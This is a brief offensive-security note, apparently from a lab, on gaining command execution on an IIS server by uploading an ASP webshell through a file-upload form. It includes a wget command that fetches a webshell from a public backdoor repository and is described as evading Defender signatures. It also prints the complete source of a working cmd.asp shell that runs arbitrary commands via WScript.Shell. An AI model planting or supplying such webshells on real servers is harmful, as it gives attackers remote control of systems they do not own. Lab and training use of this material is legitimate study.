# IIS - webshell

* There is a simple asp.net application on <http://192.168.56.22/>, this application only give us a simple file upload functionality.

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FyQhaWBa6ILHzWee3rO0N%2Fimage.png?alt=media&#x26;token=b780f846-e7a9-4ccc-9596-67decf174fd0" alt=""><figcaption></figcaption></figure>

* From there we can upload a basic aspcmd in asp : aspcmd.asp (at the time of writing, this avoid defender signature)

### aspcmd.asp

```
wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/aspcmd.asp
```

### cmd.asp

```
<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>
```

<br>

* The webshell is uploaded in the upload folder.
* And we have a command execution on the IIS server<br>

<br>